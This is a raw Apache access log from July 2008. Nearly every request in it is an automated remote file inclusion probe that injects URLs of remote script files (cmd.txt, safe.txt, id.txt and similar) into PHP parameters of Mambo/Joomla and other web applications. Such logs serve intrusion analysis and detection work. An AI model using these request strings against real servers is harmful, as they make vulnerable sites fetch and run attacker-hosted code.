62.112.193.46 - - [19/Jul/2008:10:18:12 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://www.metal-headz.co.uk/modules/coppermine/include/.../.../.../.../.../.../idsc5.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.112.193.46 - - [19/Jul/2008:10:18:12 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.metal-headz.co.uk/modules/coppermine/include/.../.../.../.../.../.../idsc5.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.112.193.46 - - [19/Jul/2008:10:18:14 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.metal-headz.co.uk/modules/coppermine/include/.../.../.../.../.../.../idsc5.txt???? HTTP/1.1" 200 18569 "-" "libwww-perl/5.805" "www.dmulk.com"
66.244.233.121 - - [19/Jul/2008:10:18:26 -0700] "GET /logs/access_080207.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.mojir.com/el/moodledata/site/bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.125.143.162 - - [19/Jul/2008:10:18:30 -0700] "GET /logs//components/com_videodb/core/videodb.class.xml.php?http://www.keywordworkshop.com/attachments/help/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
75.125.143.162 - - [19/Jul/2008:10:18:30 -0700] "GET //components/com_videodb/core/videodb.class.xml.php?http://www.keywordworkshop.com/attachments/help/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.213.245.215 - - [19/Jul/2008:10:18:41 -0700] "GET /logs/access_080315.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.lisey.ca/sohoadmin/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.29.87.80 - - [19/Jul/2008:10:19:01 -0700] "GET //preview/toplists.php?list=http://www.beatthevegasbook.com/amember/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
72.29.87.80 - - [19/Jul/2008:10:19:02 -0700] "GET /logs//preview/toplists.php?list=http://www.beatthevegasbook.com/amember/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
64.208.182.67 - - [19/Jul/2008:10:19:04 -0700] "GET /bikes/CreSTOC07/CreSTOC2007073.jpg HTTP/1.0" 200 196608 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
72.29.87.80 - - [19/Jul/2008:10:19:08 -0700] "GET //preview/toplists.php?list=http://www.beatthevegasbook.com/amember/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
72.29.87.80 - - [19/Jul/2008:10:19:09 -0700] "GET /logs//preview/toplists.php?list=http://www.beatthevegasbook.com/amember/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
218.38.54.160 - - [19/Jul/2008:10:19:14 -0700] "GET /logs/access.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://naparstki.pl/mediagallery/maint/README? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.38.54.160 - - [19/Jul/2008:10:19:16 -0700] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://naparstki.pl/mediagallery/maint/README? HTTP/1.1" 200 18535 "-" "libwww-perl/5.79" "www.dmulk.com"
218.38.54.160 - - [19/Jul/2008:10:19:17 -0700] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://naparstki.pl/mediagallery/maint/README? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.62.24.242 - - [19/Jul/2008:10:19:24 -0700] "GET /logs/access_080207.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.mojir.com/el/moodledata/site/bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.87.80 - - [19/Jul/2008:10:19:33 -0700] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.beatthevegasbook.com/amember/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
72.29.87.80 - - [19/Jul/2008:10:19:34 -0700] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.beatthevegasbook.com/amember/test.txt? HTTP/1.1" 200 18527 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
72.29.87.80 - - [19/Jul/2008:10:19:36 -0700] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.beatthevegasbook.com/amember/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
72.29.87.80 - - [19/Jul/2008:10:19:37 -0700] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.beatthevegasbook.com/amember/test.txt? HTTP/1.1" 200 18527 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
216.246.78.141 - - [19/Jul/2008:10:19:54 -0700] "GET /logs/access_080207.log/errors.php?error=http://www.h2u.nl//langs/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.246.78.141 - - [19/Jul/2008:10:19:54 -0700] "GET /errors.php?error=http://www.h2u.nl//langs/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.246.78.141 - - [19/Jul/2008:10:19:54 -0700] "GET /logs/errors.php?error=http://www.h2u.nl//langs/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.205.67.42 - - [19/Jul/2008:10:20:04 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://damtare.nm.ru/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.67.42 - - [19/Jul/2008:10:20:04 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://damtare.nm.ru/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.157.129.6 - - [19/Jul/2008:10:20:06 -0700] "GET /logs/access_080315.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.208.182.67 - - [19/Jul/2008:10:20:06 -0700] "GET /bikes/CreSTOC07/CreSTOC2007075.jpg HTTP/1.0" 200 196608 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
207.213.245.1 - - [19/Jul/2008:10:20:07 -0700] "GET /logs/access_080315.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.lisey.ca/sohoadmin/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
78.157.129.6 - - [19/Jul/2008:10:20:11 -0700] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.157.129.6 - - [19/Jul/2008:10:20:12 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.18.246 - - [19/Jul/2008:10:20:15 -0700] "GET /minamijewelry/html/index.html HTTP/1.0" 200 13287 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
218.38.54.160 - - [19/Jul/2008:10:20:26 -0700] "GET /logs/access_080315.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://naparstki.pl/mediagallery/maint/README? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.110.54.240 - - [19/Jul/2008:10:20:27 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.jpcss.com/cgi/phpconv/Bookmarks/osi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.108.67.119 - - [19/Jul/2008:10:20:30 -0700] "GET /logs//components/com_performs/http://www.keywordworkshop.com/attachments/help/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.119 - - [19/Jul/2008:10:20:30 -0700] "GET //components/com_performs/http://www.keywordworkshop.com/attachments/help/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.67.42 - - [19/Jul/2008:10:20:38 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://damtare.nm.ru/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.67.42 - - [19/Jul/2008:10:20:38 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://damtare.nm.ru/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.106 - - [19/Jul/2008:10:20:46 -0700] "GET /logs/access_080207.log/errors.php?error=http://www.h2u.nl//langs/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.106 - - [19/Jul/2008:10:20:46 -0700] "GET /errors.php?error=http://www.h2u.nl//langs/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.106 - - [19/Jul/2008:10:20:47 -0700] "GET /logs/errors.php?error=http://www.h2u.nl//langs/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.67.42 - - [19/Jul/2008:10:20:50 -0700] "GET /logs/access_080329.log//admin/classes/TplLoad.php?full_path_to_public_program=http://damtare.nm.ru/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.67.42 - - [19/Jul/2008:10:20:50 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://damtare.nm.ru/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.67.42 - - [19/Jul/2008:10:20:50 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://damtare.nm.ru/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.213.245.1 - - [19/Jul/2008:10:20:59 -0700] "GET /logs/access_080315.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.lisey.ca/sohoadmin/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.199.190.37 - - [19/Jul/2008:10:21:05 -0700] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://home.bellavillapattaya.com/modul/mic.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.208.182.67 - - [19/Jul/2008:10:21:06 -0700] "GET /bikes/CreSTOC07/CreSTOC2007076.jpg HTTP/1.0" 200 196608 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
92.51.130.220 - - [19/Jul/2008:10:21:07 -0700] "GET /logs/access_080528.log//trans/trans.php?trans=eng&page=ftp://212.11.127.86/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.246.78.141 - - [19/Jul/2008:10:21:07 -0700] "GET /logs/access.log/errors.php?error=http://www.h2u.nl//langs/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
195.199.190.37 - - [19/Jul/2008:10:21:08 -0700] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://home.bellavillapattaya.com/modul/mic.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.213.245.1 - - [19/Jul/2008:10:21:11 -0700] "GET /logs/access_080315.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.lisey.ca/sohoadmin/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.205.67.42 - - [19/Jul/2008:10:21:11 -0700] "GET /logs/access_080329.log//admin/classes/TplLoad.php?full_path_to_public_program=http://damtare.nm.ru/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.67.42 - - [19/Jul/2008:10:21:11 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://damtare.nm.ru/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.67.42 - - [19/Jul/2008:10:21:12 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://damtare.nm.ru/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.38.22.250 - - [19/Jul/2008:10:21:25 -0700] "GET /logs/access_080329.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.205.67.42 - - [19/Jul/2008:10:21:34 -0700] "GET /logs/access_080313.log//admin/classes/TplLoad.php?full_path_to_public_program=http://damtare.nm.ru/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.157.129.6 - - [19/Jul/2008:10:21:45 -0700] "GET /logs/access_080225.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.67.42 - - [19/Jul/2008:10:21:46 -0700] "GET /logs/access_080313.log//admin/classes/TplLoad.php?full_path_to_public_program=http://damtare.nm.ru/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.208.182.67 - - [19/Jul/2008:10:22:04 -0700] "GET /bikes/CreSTOC07/CreSTOC2007077.jpg HTTP/1.0" 200 196608 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
72.29.87.80 - - [19/Jul/2008:10:22:04 -0700] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.beatthevegasbook.com/amember/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
72.29.87.80 - - [19/Jul/2008:10:22:04 -0700] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.beatthevegasbook.com/amember/test.txt? HTTP/1.1" 200 18527 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
89.111.176.106 - - [19/Jul/2008:10:22:22 -0700] "GET /logs/access.log/errors.php?error=http://www.h2u.nl//langs/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.213.245.215 - - [19/Jul/2008:10:22:24 -0700] "GET /logs/access_080315.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.lisey.ca/sohoadmin/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.29.87.80 - - [19/Jul/2008:10:22:39 -0700] "GET /logs/errors.php?error=http://www.h2u.nl//langs/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.87.80 - - [19/Jul/2008:10:22:39 -0700] "GET /errors.php?error=http://www.h2u.nl//langs/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.143.233.40 - - [19/Jul/2008:10:22:49 -0700] "GET /logs/access.log/?mosConfig_absolute_path=http://www.almacenes-si2.com/portal/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.143.233.40 - - [19/Jul/2008:10:22:50 -0700] "GET /logs/?mosConfig_absolute_path=http://www.almacenes-si2.com/portal/bajo.txt? HTTP/1.1" 200 56851 "-" "libwww-perl/5.79" "www.dmulk.com"
217.110.54.240 - - [19/Jul/2008:10:22:55 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.jpcss.com/cgi/phpconv/Bookmarks/osi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.246.78.141 - - [19/Jul/2008:10:22:59 -0700] "GET /logs/errors.php?error=http://www.h2u.nl//langs/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.246.78.141 - - [19/Jul/2008:10:22:59 -0700] "GET /errors.php?error=http://www.h2u.nl//langs/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.111.176.106 - - [19/Jul/2008:10:23:03 -0700] "GET /logs/errors.php?error=http://www.h2u.nl//langs/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.106 - - [19/Jul/2008:10:23:04 -0700] "GET /errors.php?error=http://www.h2u.nl//langs/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.208.182.67 - - [19/Jul/2008:10:23:06 -0700] "GET /bikes/CreSTOC07/CreSTOC2007078.jpg HTTP/1.0" 200 196608 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
67.205.67.42 - - [19/Jul/2008:10:23:14 -0700] "GET /logs/access_080315.log//admin/business_inc/saveserver.php?thisdir=http://damtare.nm.ru/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.67.42 - - [19/Jul/2008:10:23:14 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://damtare.nm.ru/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.67.42 - - [19/Jul/2008:10:23:14 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://damtare.nm.ru/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.67.42 - - [19/Jul/2008:10:23:19 -0700] "GET /logs/access_080315.log//admin/business_inc/saveserver.php?thisdir=http://damtare.nm.ru/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.67.42 - - [19/Jul/2008:10:23:19 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://damtare.nm.ru/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.67.42 - - [19/Jul/2008:10:23:19 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://damtare.nm.ru/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.198.175.18 - - [19/Jul/2008:10:23:32 -0700] "GET /logs/access_080325.log/?mosConfig_absolute_path=http://www.grousetyee.com/jupload/README? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.103.23.40 - - [19/Jul/2008:10:23:52 -0700] "GET /logs/access_080315.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.chonil.co.kr/zboard/icon/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.67.42 - - [19/Jul/2008:10:24:02 -0700] "GET /logs/access_080313.log//admin/business_inc/saveserver.php?thisdir=http://damtare.nm.ru/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.67.42 - - [19/Jul/2008:10:24:03 -0700] "GET /logs/access_080313.log//admin/business_inc/saveserver.php?thisdir=http://damtare.nm.ru/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.213.245.1 - - [19/Jul/2008:10:24:04 -0700] "GET /logs/access_080315.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.lisey.ca/sohoadmin/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.208.182.67 - - [19/Jul/2008:10:24:08 -0700] "GET /bikes/CreSTOC07/CreSTOC2007079.jpg HTTP/1.0" 200 196608 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
67.205.67.42 - - [19/Jul/2008:10:24:23 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://damtare.nm.ru/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.67.42 - - [19/Jul/2008:10:24:23 -0700] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://damtare.nm.ru/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.208.182.67 - - [19/Jul/2008:10:25:12 -0700] "GET /bikes/CreSTOC07/CreSTOC2007080.jpg HTTP/1.0" 200 196608 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
216.246.78.141 - - [19/Jul/2008:10:25:20 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://www.h2u.nl//langs/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.246.78.141 - - [19/Jul/2008:10:25:22 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.h2u.nl//langs/a.txt?? HTTP/1.1" 200 18411 "-" "libwww-perl/5.811" "www.dmulk.com"
216.246.78.141 - - [19/Jul/2008:10:25:23 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.h2u.nl//langs/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.246.78.141 - - [19/Jul/2008:10:25:29 -0700] "GET /logs/access.log/errors.php?error=http://www.h2u.nl//langs/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.246.78.141 - - [19/Jul/2008:10:25:29 -0700] "GET /errors.php?error=http://www.h2u.nl//langs/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.246.78.141 - - [19/Jul/2008:10:25:29 -0700] "GET /logs/errors.php?error=http://www.h2u.nl//langs/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
194.79.75.195 - - [19/Jul/2008:10:25:33 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.geocities.com/willysahputra/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
194.79.75.195 - - [19/Jul/2008:10:25:34 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.geocities.com/willysahputra/test.txt??? HTTP/1.1" 200 18521 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
207.213.245.215 - - [19/Jul/2008:10:25:38 -0700] "GET /logs/access_080315.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.lisey.ca/sohoadmin/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.244.233.121 - - [19/Jul/2008:10:25:57 -0700] "GET /logs/access_080211.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.mojir.com/el/moodledata/site/bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.87.80 - - [19/Jul/2008:10:25:57 -0700] "GET /shop.php?prod=http://www.beatthevegasbook.com/amember/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
72.29.87.80 - - [19/Jul/2008:10:25:57 -0700] "GET /logs/shop.php?prod=http://www.beatthevegasbook.com/amember/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
209.62.24.242 - - [19/Jul/2008:10:26:01 -0700] "GET /logs/access_080211.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.mojir.com/el/moodledata/site/bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.213.245.1 - - [19/Jul/2008:10:26:05 -0700] "GET /logs/access_080315.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.lisey.ca/sohoadmin/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.143.233.40 - - [19/Jul/2008:10:26:06 -0700] "GET /logs/access_080225.log//popup_window.php?site_isp_root=http://www.almacenes-si2.com/portal/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.143.233.40 - - [19/Jul/2008:10:26:07 -0700] "GET /logs//popup_window.php?site_isp_root=http://www.almacenes-si2.com/portal/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.208.182.67 - - [19/Jul/2008:10:26:10 -0700] "GET /bikes/CreSTOC07/CreSTOC2007081.jpg HTTP/1.0" 200 196608 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
67.205.67.42 - - [19/Jul/2008:10:26:11 -0700] "GET /logs/access_080118.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://damtare.nm.ru/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.67.42 - - [19/Jul/2008:10:26:11 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://damtare.nm.ru/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.67.42 - - [19/Jul/2008:10:26:11 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://damtare.nm.ru/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.38.22.250 - - [19/Jul/2008:10:26:22 -0700] "GET /logs/access.log/errors.php?error=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.22.250 - - [19/Jul/2008:10:26:22 -0700] "GET /errors.php?error=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.22.250 - - [19/Jul/2008:10:26:22 -0700] "GET /logs/errors.php?error=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.246.124.139 - - [19/Jul/2008:10:26:27 -0700] "GET /logs/p.php?p=http://alternate-zone.com/themes/Sage/lightbox/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.246.124.139 - - [19/Jul/2008:10:26:27 -0700] "GET /logs/access_080325.log/p.php?p=http://alternate-zone.com/themes/Sage/lightbox/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.246.124.139 - - [19/Jul/2008:10:26:27 -0700] "GET /p.php?p=http://alternate-zone.com/themes/Sage/lightbox/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
202.134.105.107 - - [19/Jul/2008:10:26:32 -0700] "GET /logs/access.log/?mosConfig_absolute_path=http://h1.ripway.com/udpflood/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.85.102.100 - - [19/Jul/2008:10:26:33 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.geocities.com/marlinarika/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
202.134.105.107 - - [19/Jul/2008:10:26:33 -0700] "GET /logs/?mosConfig_absolute_path=http://h1.ripway.com/udpflood/id.txt? HTTP/1.1" 200 56851 "-" "libwww-perl/5.803" "www.dmulk.com"
